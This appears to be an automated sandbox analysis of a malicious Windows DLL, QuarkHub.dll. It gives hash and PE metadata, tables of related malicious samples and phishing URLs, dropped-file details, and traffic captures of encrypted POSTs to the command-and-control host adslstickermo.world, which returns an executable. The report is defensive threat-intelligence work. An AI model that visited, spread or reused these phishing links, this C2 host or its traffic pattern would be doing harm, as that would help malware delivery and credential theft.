CLOUDFLARENETUS	https://r20.rs6.net/tn.jsp?f=001li4RqeGHZ8qwYmafrEBmla3Ga7E7d6hyrEFrY04IgbfTxR2C0d1M-t25GQWTRzLWi3oeztkmSNT2Tp-22ACxRhevmIf2VMfgYOKK-YkOrEJSnligNe0NLBMeBHGGNrD7_85LLR0X12GrlFEgreACgpduIm6a3gqBb6ik_LDxepG-TG9luf7ms5XGNiwc4coI&c=&ch==&__=/data/bmFuY3kucm9uZ29lQHJhdmVpcy5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	HexaTracer.dll	Get hash	malicious	Unknown	Browse	104.21.7.206
	HexaTracer.dll	Get hash	malicious	Unknown	Browse	172.67.188.3
	http://camelsbackresort.com/	Get hash	malicious	Unknown	Browse	104.18.6.145
	https://trk.klclick3.com/ls/click?upn=qv6sSJ61i-2FCKcGs-2FWg5X5zSxUPH2ZrqUtgTrwIqP9tbV5nGRnmcCyzwEsyGChMEEVfcMVsKyWwCHSROXPHp2ssugEGqO5s0anA-2For84UxcDq0TVqcknxBCOK9bomYKxHZeGI_sriuaryqqdv1VntrH6X8cr710FsqQrnNUbUkxkf7x0pMSAkpeuB0WYDuTzAgnc1ypLmqKYwtOZGJRbr42WyOuUQfTu-2F4nzRvnExBDhTcsDCxAYSlvrUnKqhNu2QucwzzHnfd3nc1PaEOPnCY7lVi-2F-2FTTNyovG0zYk5qi6TlQOaMUlPhhOg1CBzrWoD-2BJCy6CeRTNCOxMmeykKFlmppbGGEqcnv1Ns33HkJq5QrEE1i7TzFrSdTciiW2xeho3yieI3kgFCvNAbW4DmtirZICDakbW9OIKR7-2BXEXF9V211cy5MWvnRyElRCDnZQGhhC4Xmy8QpWVQ1hkRUjNSqbxBIyJs0NLN-2BicHZse9nYwlxxMdUHA7kW8jSzXcgtmt4bmXpQ8CJpa3Q6l8HoWplFamAv33yszfV6dEc-2BB0CG8c2HMNZZ1XSXq7GmTl-2BvMA-2BfRvY#YnJ5b255LmdyaW1lc0B2aXJnaW5tZWRpYW8yLmNvLnVr	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://fvytvgh.blob.core.windows.net/vhgvhcg/6398.html	Get hash	malicious	Phisher	Browse	104.21.80.104
	Invoice 4149.htm	Get hash	malicious	Unknown	Browse	104.17.3.184
	PDFSuperHero (1).exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://link.mail.beehiiv.com/ls/click?upn=mj0CM11MVk8qyyXqn6a1b3DCij-2B8AsDJ0vuxDmyyADlar-2FKB2tByZ07ugrFe654dACDeYFpbwHlEohN1te-2Bv52JqAF-2BtudQ8mBJHG6ceiT29NgYpOt1N9vhzpX6oa3MPfHwgum2yjrt5kRCp1OrJZB5-2FwPHHFJBjQMJ2V1Ad5x0720ZUuVKlykm0nkDvycGmQy36xIML5nKfNhxM1snfTEcFS6VSpn8WUNpOntX66LM-3DOPHt_D1DFG9IlwQf2DnJocRQbRfGQCzjMyMNPnYFzJFjGPo7uS90BQ0QQaHh9rIpzb2mo7gohh8rwKVmAmnv2PvSex4gwQEpxEaRzO4a1n2rgnTObRYup1XLHvlPihq6TN26bQhdvmFpAcxNA6bl8iHGjEE1Ti-2F-2BoAUatM46YvD14UG4dLUk-2FaosR9rkjaMaZB-2FBWhNrFD-2FOS58L3RkEYWzTXsUTZCrfEqwYFfQ-2BjUmJwrJsBr3h2y8G-2F4AZSAjJyMzjEj1Qxah-2F1Yxg9IFUGCZNBOC0FgFGmwH0Q5DoJZH4FJYQ5VOyHpqWziO3KjqFoxmqWrLDplEMsfk9y6ocI7Eoc6FqxrCHBmqNosBHNkKxGv76o3HOyQzNS1TY70LrjAwwYx98WwehIf5ZvlB7vG1tVIo8Q7scK-2Bc6I-2Bwhhrnjj-2Fpxg9q3kOD0M7sEd7p4MPHj4	Get hash	malicious	Unknown	Browse	104.18.69.40
	http://www.tinyurl.com/stationnement-infraction	Get hash	malicious	Unknown	Browse	172.67.41.60
	confirmation.vbs	Get hash	malicious	Redline Clipper	Browse	104.21.84.67
	https://aisdec.s3.eu-west-3.amazonaws.com/url.html#cl/15277_md/81/5390/1509/80/120824	Get hash	malicious	Phisher	Browse	104.21.80.104
	https://dmeodlekaed.blob.core.windows.net/dmeodlekaed/url.html#cl/8478_md/12/678/2075/430/395518	Get hash	malicious	Unknown	Browse	104.21.53.158
	SecuriteInfo.com.Variant.Mikey.151510.2976.16417.exe	Get hash	malicious	Unknown	Browse	104.26.7.37
	SecuriteInfo.com.PUA.Tool.Siggen.9393.12164.29074.exe	Get hash	malicious	Unknown	Browse	104.18.2.36
	https://xxxcxvgffgbjhbert49.storage.googleapis.com/xxxcxvgffgbjhbert49/1.html#cl/18665_md/72/15079/4035/19021/552318	Get hash	malicious	Phisher	Browse	104.21.80.104
	https://welcomewinner.com/?action=register&sub_id=RADIASI-CUBLUK	Get hash	malicious	Phisher	Browse	172.67.206.138
	ATT00001.htm	Get hash	malicious	Unknown	Browse	104.17.25.14
	import_order.scr.exe	Get hash	malicious	AgentTesla	Browse	162.159.128.233
	F900_-_VSL_DESC.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
CLOUDFLARENETUS	https://r20.rs6.net/tn.jsp?f=001li4RqeGHZ8qwYmafrEBmla3Ga7E7d6hyrEFrY04IgbfTxR2C0d1M-t25GQWTRzLWi3oeztkmSNT2Tp-22ACxRhevmIf2VMfgYOKK-YkOrEJSnligNe0NLBMeBHGGNrD7_85LLR0X12GrlFEgreACgpduIm6a3gqBb6ik_LDxepG-TG9luf7ms5XGNiwc4coI&c=&ch==&__=/data/bmFuY3kucm9uZ29lQHJhdmVpcy5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	HexaTracer.dll	Get hash	malicious	Unknown	Browse	104.21.7.206
	HexaTracer.dll	Get hash	malicious	Unknown	Browse	172.67.188.3
	http://camelsbackresort.com/	Get hash	malicious	Unknown	Browse	104.18.6.145
	https://trk.klclick3.com/ls/click?upn=qv6sSJ61i-2FCKcGs-2FWg5X5zSxUPH2ZrqUtgTrwIqP9tbV5nGRnmcCyzwEsyGChMEEVfcMVsKyWwCHSROXPHp2ssugEGqO5s0anA-2For84UxcDq0TVqcknxBCOK9bomYKxHZeGI_sriuaryqqdv1VntrH6X8cr710FsqQrnNUbUkxkf7x0pMSAkpeuB0WYDuTzAgnc1ypLmqKYwtOZGJRbr42WyOuUQfTu-2F4nzRvnExBDhTcsDCxAYSlvrUnKqhNu2QucwzzHnfd3nc1PaEOPnCY7lVi-2F-2FTTNyovG0zYk5qi6TlQOaMUlPhhOg1CBzrWoD-2BJCy6CeRTNCOxMmeykKFlmppbGGEqcnv1Ns33HkJq5QrEE1i7TzFrSdTciiW2xeho3yieI3kgFCvNAbW4DmtirZICDakbW9OIKR7-2BXEXF9V211cy5MWvnRyElRCDnZQGhhC4Xmy8QpWVQ1hkRUjNSqbxBIyJs0NLN-2BicHZse9nYwlxxMdUHA7kW8jSzXcgtmt4bmXpQ8CJpa3Q6l8HoWplFamAv33yszfV6dEc-2BB0CG8c2HMNZZ1XSXq7GmTl-2BvMA-2BfRvY#YnJ5b255LmdyaW1lc0B2aXJnaW5tZWRpYW8yLmNvLnVr	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://fvytvgh.blob.core.windows.net/vhgvhcg/6398.html	Get hash	malicious	Phisher	Browse	104.21.80.104
	Invoice 4149.htm	Get hash	malicious	Unknown	Browse	104.17.3.184
	PDFSuperHero (1).exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://link.mail.beehiiv.com/ls/click?upn=mj0CM11MVk8qyyXqn6a1b3DCij-2B8AsDJ0vuxDmyyADlar-2FKB2tByZ07ugrFe654dACDeYFpbwHlEohN1te-2Bv52JqAF-2BtudQ8mBJHG6ceiT29NgYpOt1N9vhzpX6oa3MPfHwgum2yjrt5kRCp1OrJZB5-2FwPHHFJBjQMJ2V1Ad5x0720ZUuVKlykm0nkDvycGmQy36xIML5nKfNhxM1snfTEcFS6VSpn8WUNpOntX66LM-3DOPHt_D1DFG9IlwQf2DnJocRQbRfGQCzjMyMNPnYFzJFjGPo7uS90BQ0QQaHh9rIpzb2mo7gohh8rwKVmAmnv2PvSex4gwQEpxEaRzO4a1n2rgnTObRYup1XLHvlPihq6TN26bQhdvmFpAcxNA6bl8iHGjEE1Ti-2F-2BoAUatM46YvD14UG4dLUk-2FaosR9rkjaMaZB-2FBWhNrFD-2FOS58L3RkEYWzTXsUTZCrfEqwYFfQ-2BjUmJwrJsBr3h2y8G-2F4AZSAjJyMzjEj1Qxah-2F1Yxg9IFUGCZNBOC0FgFGmwH0Q5DoJZH4FJYQ5VOyHpqWziO3KjqFoxmqWrLDplEMsfk9y6ocI7Eoc6FqxrCHBmqNosBHNkKxGv76o3HOyQzNS1TY70LrjAwwYx98WwehIf5ZvlB7vG1tVIo8Q7scK-2Bc6I-2Bwhhrnjj-2Fpxg9q3kOD0M7sEd7p4MPHj4	Get hash	malicious	Unknown	Browse	104.18.69.40
	http://www.tinyurl.com/stationnement-infraction	Get hash	malicious	Unknown	Browse	172.67.41.60
	confirmation.vbs	Get hash	malicious	Redline Clipper	Browse	104.21.84.67
	https://aisdec.s3.eu-west-3.amazonaws.com/url.html#cl/15277_md/81/5390/1509/80/120824	Get hash	malicious	Phisher	Browse	104.21.80.104
	https://dmeodlekaed.blob.core.windows.net/dmeodlekaed/url.html#cl/8478_md/12/678/2075/430/395518	Get hash	malicious	Unknown	Browse	104.21.53.158
	SecuriteInfo.com.Variant.Mikey.151510.2976.16417.exe	Get hash	malicious	Unknown	Browse	104.26.7.37
	SecuriteInfo.com.PUA.Tool.Siggen.9393.12164.29074.exe	Get hash	malicious	Unknown	Browse	104.18.2.36
	https://xxxcxvgffgbjhbert49.storage.googleapis.com/xxxcxvgffgbjhbert49/1.html#cl/18665_md/72/15079/4035/19021/552318	Get hash	malicious	Phisher	Browse	104.21.80.104
	https://welcomewinner.com/?action=register&sub_id=RADIASI-CUBLUK	Get hash	malicious	Phisher	Browse	172.67.206.138
	ATT00001.htm	Get hash	malicious	Unknown	Browse	104.17.25.14
	import_order.scr.exe	Get hash	malicious	AgentTesla	Browse	162.159.128.233
	F900_-_VSL_DESC.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	HexaTracer.dll	Get hash	malicious	Unknown	Browse	104.21.33.213
	HexaTracer.dll	Get hash	malicious	Unknown	Browse	104.21.33.213
	ep_setup.exe	Get hash	malicious	Unknown	Browse	104.21.33.213
	SecuriteInfo.com.Trojan.Inject2.830.6488.6761.exe	Get hash	malicious	Unknown	Browse	104.21.33.213
	SecuriteInfo.com.Variant.Mikey.151510.2976.16417.exe	Get hash	malicious	Unknown	Browse	104.21.33.213
	SecuriteInfo.com.Variant.Zusy.508517.2343.1060.exe	Get hash	malicious	Unknown	Browse	104.21.33.213
	Setup.exe	Get hash	malicious	Vidar	Browse	104.21.33.213
	buildz.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.21.33.213
	V8F7xkP66A.exe	Get hash	malicious	Xmrig	Browse	104.21.33.213
	Mk7woAn6lz.exe	Get hash	malicious	Babuk, Djvu	Browse	104.21.33.213
	Setup.msi	Get hash	malicious	Unknown	Browse	104.21.33.213
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	104.21.33.213
	4dej5mvuGp.exe	Get hash	malicious	RisePro Stealer	Browse	104.21.33.213
	0x0009000000023234-253.exe	Get hash	malicious	AsyncRAT, DcRat, XWorm	Browse	104.21.33.213
	0x000600000002323a-338.exe	Get hash	malicious	AsyncRAT, DcRat, XWorm	Browse	104.21.33.213
	6101XOxMbY.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	104.21.33.213
	AzfNwECzKH.exe	Get hash	malicious	RMSRemoteAdmin, xRAT	Browse	104.21.33.213
	Sz8KLg559F.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	104.21.33.213
	12. Consolidado destinos Diciembre.xlsx	Get hash	malicious	Unknown	Browse	104.21.33.213
	6JrdNYGEPZ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Stealc	Browse	104.21.33.213

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	6277
Entropy (8bit):	7.9779749640332644
Encrypted:	false
SSDEEP:	96:sNZE4rIY7p33bS7Nh0L7wQhSPHNiQwXuAp+WRlFX4b+Fm/ZCMErGzw670prw:cEiIq2NSMJHEQw+PWd4z/6Gzd70prw
MD5:	A077A87D1073D32E7F5460E1E27D94F2
SHA1:	A55CBD662EDFF0EEE1A403363A05BAFC6DE46061
SHA-256:	07A679109E45959528C94FAD4306BFE7A9ADEF6D8D8C1924E16832E29267BA6E
SHA-512:	C294C1EC16A87AE3B6959C0E985D7FDDE27B348C70318F92DC053A43EE871C116008F79417C34EC171B808D4DCA56E844C2D864C02536D2C716DB9DA7D3478BB
Malicious:	false
Preview:	..\|i...zw....}sR..!q....:..N9w\|tiK.b)...9#O%3.x.#..Y..c.{.....>...wz..j...a..Y</.7@.d.O.....].t...(..\IQks....-?....M...s~.\>G.2.b7.6..............).\|...<.^V.8l......a_..4..........X..UhL......h.P..q./+.3<w.Q.d..J.o.f.......}:....U.A..q,..Q~1..k..=yF..0..Za........qX.L.....s.p..b."..........>..Y.0.._Hi.re.p2..........N}0H../.Q..3b........j.b......9S.......M,..\...YA..^a.\.>b.....G(h...`7.3.G.e.r.$.(k.......".h.m.a..2%...N.).....e....v...P.2...A}.<.....h.@.g.0l.8..p?\|~...u..'...mYK......d...2r....\.....7"..@.RjV.o...T....U....5...1.....[7....v..t0.v.....$XG...H9.Y.~.....i..l}..3.l-@T.V.......F.T.h.v..gN....Fu...T..K.I...\6U...#......ncq..c.g.s..i.D..rvH$.,..XdS....<'..../.z..6....,....-U.&........G5.G\|.Y.;^......Z...3..n.+...u.=.q.F\6...O..c..W.)..L..b+]28.4_./B.5.3L.)....r.6}.#..e......a..Ko}...oN..I.$ZI....Iz..#!...vd9........)]........gb;H..Oy.&...M......6.%]A....s..0....Z.E..K.!^...hr.H....>..Z.Nn...I.....<}../.3....^...

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PEM certificate
Category:	dropped
Size (bytes):	1076
Entropy (8bit):	5.922580041572654
Encrypted:	false
SSDEEP:	24:Lr3+WJ2LkzvD0kmmGaQ/Q/LbA4pocFhIig1OavYjrNE3C/R:LrbJUkmmhQAL+cm1OaIBK0
MD5:	E19609AF9B8232876651FD4290DFB48E
SHA1:	84A1570BA5C925DDAF1F36DB0A1918F0168369A1
SHA-256:	D16CDFE0AB830BEC3B5A79EEEDC94E59261ADAC8E7522430C215A63920A9593D
SHA-512:	CB6DB100E1C490932D246CC83B162EC7E46C85FB1D9B1216DF5900C56BC1DA9F03ABF4BE0FE8BD00EE1E4617903BCB37B00CFD1DFA3129FF738B3151E371431B
Malicious:	false
Preview:	-----BEGIN CERTIFICATE-----..MIIC+DCCAeCgAwIBAgIEf6rMDTANBgkqhkiG9w0BAQsFADAkMRIwEAYDVQQKDAlQZXd1cnlhdmYxDjAMBgNVBAMMBUJ5dGlmMB4XDTIzMTAzMDE3MjUwN1oXDTI0MTAyOTE3MjUwN1owJDESMBAGA1UECgwJUGV3dXJ5YXZmMQ4wDAYDVQQDDAVCeXRpZjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALncb6anBNZVVq4Wy4xkKpv/A60WZMnt5rEAkEKHA55Rw+qyL6Ls0TXKu4ZtLPjDYX0OjZjPLFcJRdsGCCVBxQ+9x9nRg9OtSS5XSNX7/KTYa1z/lWRvhto0LNCOJEGFIjlNrWueUQBXPmXt2eYJrvP0Kn9q2VwdF7i7SQrqIKEkkjU0BPV0ldPB0pGjZqVMx7lZ4rh+VzgB6s7YZW2nHwk3MwJkIEgVEtHUYxxuamu8xgdjMlkaEyI494ijQX0ec0hO3rvGgFlVV13hcDGuh2UbC9HWsfHNtr05u+VdjhMVNQQG3uHEFz/zeWaSk1ihNSjW+d+iBm6t2yFUkEco27MCAwEAAaMyMDAwHQYDVR0OBBYEFDOKb/bxA5oyjI3qZ8Ne+eF9P6ZoMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAGsgsM7tdSMaVfVfR/kWYRnGT0YauMAKYY+IAEwmrrttyHgx7FYJzc5YtekfwBwOZn+wuOaze8rv9SVzLILv6m2Cpp60gLH3+oWThI4+UcP8DDTPwlmNNb9i5BRfq0IhtkwM9PGDReuYXbQKhCqr4NkUhRocDA9nmzQtZqC64YqvZLCey0s2t+IbZP4NOAZdMPOJmND1ngrNXUBG+Y8IuJfemcRDd+YN996RgE0Mgd3DyW8JemSjdwqvD5bpI7pbFTPORQv12KNN70emw2iFNTuhTRyAl3mnG95gZ1L

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	modified
Size (bytes):	174592
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0FA56BA125B932984B3346EC037E5C49
SHA1:	6A2C5D402ECD37BAC400FDEF1701064FDEE6E11D
SHA-256:	9CE157834ACA232C82D7A74FFCA920AA06B13116357CB76692653F5D6F529B29
SHA-512:	2EDCDD2A7762AB32D9BAA7998E6BE2BA0498B113330635EA876436E7389CA9ED77DF958B197DA41D95B7E719964CAC623EC948AE253DD56482D258CEC5013C3B
Malicious:	true
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

File type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Entropy (8bit):	5.788050707285261
TrID:	Win64 Dynamic Link Library (generic) (102004/3) 86.43% Win64 Executable (generic) (12005/4) 10.17% Generic Win/DOS Executable (2004/3) 1.70% DOS Executable Generic (2002/1) 1.70% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:	QuarkHub.dll
File size:	174'592 bytes
MD5:	36cd73ea4c74093a924120d8d4393e3f
SHA1:	97cbb92a05c1283c4b2a3b87a5b4bd86e743acb8
SHA256:	4f200426bf58e8d41b88edd66f3a8dd70b53e31b3903685024c1a68cb2750385
SHA512:	ec3cb1447ccb94c423e946062f35988adc85512ac5b18fd7cbc34fe21006879083c4a527671dd864578d5fdfb11bd6778910eef051cdacaec990f7bc9e87d14d
SSDEEP:	1536:ABeGgP8BXztXmwPpYRQQECQaiE7H2J+EfnvcX+PErx/23mhMTfRVITL9Lufqag8N:AQTPmpNQ2zMusx4TJKGDWq+399A
TLSH:	D9046167D27760E9D6BEC07895A27522FCB139588238AB6BCB508B235B20F60F53D714
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........p...............z..............5d..............5d......5d......Rich............................PE..d...9.{e.........." .......

Entrypoint:	0x18000e6c0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x180000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x657B9D39 [Fri Dec 15 00:26:33 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	3176476b30676374530c93b0ea09cede

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x2af50	0x48	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2af98	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x32000	0x553	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x30000	0x1bc	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x31000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2a000	0x20	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2858e	0x28600	False	0.44413336880804954	data	5.743756555939297	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2a000	0x101a	0x1200	False	0.658203125	data	6.501865085952881	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2c000	0x39a0	0x400	False	0.44140625	OpenPGP Secret Key	3.3771265624435483	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x30000	0x1bc	0x200	False	0.65234375	data	4.318361182478284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x31000	0xc	0x200	False	0.048828125	data	0.13872951814887827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x32000	0x553	0x600	False	0.3938802083333333	data	3.7768035186761373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x320a0	0x348	data	English	United States	0.44761904761904764
RT_MANIFEST	0x323e8	0x16b	ASCII text, with CRLF line terminators	English	United States	0.5179063360881543

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2024 18:24:49.608530045 CET	65011	53	192.168.2.4	1.1.1.1
Jan 3, 2024 18:24:49.748579025 CET	53	65011	1.1.1.1	192.168.2.4
Jan 3, 2024 18:26:25.024626017 CET	50941	53	192.168.2.4	1.1.1.1
Jan 3, 2024 18:26:25.298727989 CET	53	50941	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
2024-01-03 17:24:50 UTC	150	OUT	POST / HTTP/1.1 Accept: / User-Agent: User metrics Host: adslstickermo.world Content-Length: 290 Connection: Close Cache-Control: no-cache
2024-01-03 17:24:50 UTC	290	OUT	Data Raw: fd 37 31 35 7b 33 b4 96 35 8d 2d a6 0c cf 69 0e e1 f3 d2 97 79 45 44 ba 77 90 59 49 2c 3d c0 ac 14 b2 d1 7f 23 4c d8 a2 fb a9 5f 82 5a fb f4 04 3f a4 7c ac 2d 54 03 38 db c9 8d e1 3b 8a 61 ec 84 2b 36 2b fa 35 40 5b 90 ce 09 79 cd 71 42 f2 34 d5 91 17 20 0f 33 0e 6d 63 0a 81 a9 ce 8c b0 e5 80 ae 82 9a 95 15 41 12 ee 81 75 44 ed 29 07 50 52 a6 85 b9 65 51 eb 14 1d bc 04 8f 90 d9 49 ec c3 1d 25 88 25 a2 04 20 87 26 fd 35 01 7a b5 d1 f5 a9 06 9a fb 84 be 11 ef a0 13 a2 e0 c2 2b c4 96 dc ce 22 4c 53 a4 5b b9 a0 da e0 ba b0 d6 d2 57 84 ec bc 5f c7 0a 42 59 0d 13 51 d7 55 7a 21 de f2 24 25 d5 39 e4 0e 0b bb ad b3 aa 3d 7e 62 2d 23 cf 97 0d 9c d7 ff 2b 7a 7f 32 77 01 c8 fb 19 d5 0b 39 f6 ba 59 df 10 2b 6d eb d7 d7 1e 18 dc 95 e2 e2 d2 29 bf 28 f8 42 52 c8 02 ee Data Ascii: 715{35-iyEDwYI,=#L_Z?\|-T8;a+6+5@[yqB4 3mcAuD)PReQI%% &5z+"LS[W_BYQUz!$%9=~b-#+z2w9Y+m)(BR
2024-01-03 17:24:51 UTC	578	IN	HTTP/1.1 200 OK Date: Wed, 03 Jan 2024 17:24:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I0FSWCQpmWbUZ7YM0%2FIGXuEaxsM3W5R3P%2Bt12m%2BeteF8B6dlVexXOYsrFe3308hWj5U3ww1s9Hh%2B3LHxub7D25TCFw7DdkS1Kdjy2D9JAT45uji0KoO4VETCQLGOLVpHC9N0dgPg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83fcf007d84f4782-DFW alt-svc: h3=":443"; ma=86400
2024-01-03 17:24:51 UTC	70	IN	Data Raw: 34 30 0d 0a 3e 86 23 ab f4 46 1a dc f7 20 2c 5d 71 18 d2 f5 a7 c8 8c 80 fe 9f e0 da 75 8b c4 77 c2 80 a2 4b a8 c1 a7 06 62 38 be bb 19 1d c3 2e f5 20 fa 3d 2b 89 5a 32 62 81 19 d4 9f 84 d0 ce 8f 09 8b a4 0d 0a Data Ascii: 40>#F ,]quwKb8. =+Z2b
2024-01-03 17:24:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-03 17:24:53 UTC	150	OUT	POST / HTTP/1.1 Accept: / User-Agent: User metrics Host: adslstickermo.world Content-Length: 310 Connection: Close Cache-Control: no-cache
2024-01-03 17:24:53 UTC	310	OUT	Data Raw: ca 16 46 25 5e 4a 9f 45 79 e6 87 d6 95 cc c8 06 84 6d 3d 9c 4e fd 1b a3 6d 67 e7 08 1d 88 12 56 8a 6b 41 79 98 dc c6 f6 5b 34 73 dd 07 0b ce ce 08 c1 a8 b8 e8 83 3c e6 60 7d e5 b7 97 52 b2 06 c4 e4 dd f9 af 45 de 02 ce dd cd df a9 0e fd a9 b7 85 8c 33 2c e6 29 e2 c7 76 ab a4 01 48 ba 46 53 90 01 82 1f 00 85 cf cb ff ad ab ec 3a 13 1c e5 c4 b7 ce 8a 23 3e 2e 41 96 76 f2 f2 6c 13 b4 08 40 e1 24 33 9a 89 1d 78 cf 0a 02 d6 8c 7a e0 54 31 e9 d6 bd 53 1d dd 37 88 4e 97 71 eb a7 91 24 0d 73 bb 56 09 98 95 f5 4a 7f c9 ba 81 24 61 7f 5b e0 50 aa 7e 90 fb 6e ec 23 68 a3 d4 c9 b6 bb 4f 4c 04 ac 4d 7a 54 bd b9 22 a5 f2 ba 33 cd 5e 9a f5 9d c8 7e 06 62 f1 01 81 2a f6 a9 ff ee 2c 52 c2 14 5e 1f 52 95 30 85 4a 4b 9b 5c bc b9 64 27 f4 62 77 c7 d8 26 86 d6 bf a3 5e 12 7c Data Ascii: F%^JEym=NmgVkAy[4s<`}RE3,)vHFS:#>.Avl@$3xzT1S7Nq$sVJ$a[P~n#hOLMzT"3^~b*,R^R0JK\d'bw&^\|
2024-01-03 17:24:54 UTC	582	IN	HTTP/1.1 200 OK Date: Wed, 03 Jan 2024 17:24:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dq%2F8CQwAmlXD4arQY9MVOeAj1JU6ZEoCpy0yLNEIa4P4dwFnQwI2n3fjcyPluBO9NnadT%2BpvFfmkezkbeLd%2BDkn7ErbrHMKX6nc2Y1ny2ilC%2Bz6GDlTuc%2B7F%2BVFE8JRCdeikA8N8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83fcf01b7ae16b43-DFW alt-svc: h3=":443"; ma=86400
2024-01-03 17:24:54 UTC	787	IN	Data Raw: 37 36 37 61 0d 0a 01 00 00 00 00 00 02 02 00 00 00 00 18 c8 90 65 ad 56 15 c4 00 a8 04 00 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 62 04 00 ad 5d 04 00 00 90 04 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d 2e 01 c5 59 4f 6f 96 59 4f 6f 96 59 4f 6f 96 4d 24 6e 97 5a 4f 6f 96 59 4f 6e 96 5a 4f 6f 96 9d 3a 6c 97 58 4f 6f 96 59 4f 6f 96 58 4f 6f 96 9d 3a 6f 97 58 4f 6f 96 9d 3a 6d 97 58 4f 6f 96 52 69 63 68 59 4f 6f 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 17 Data Ascii: 767aeVMZ@\b]!L!This program cannot be run in DOS 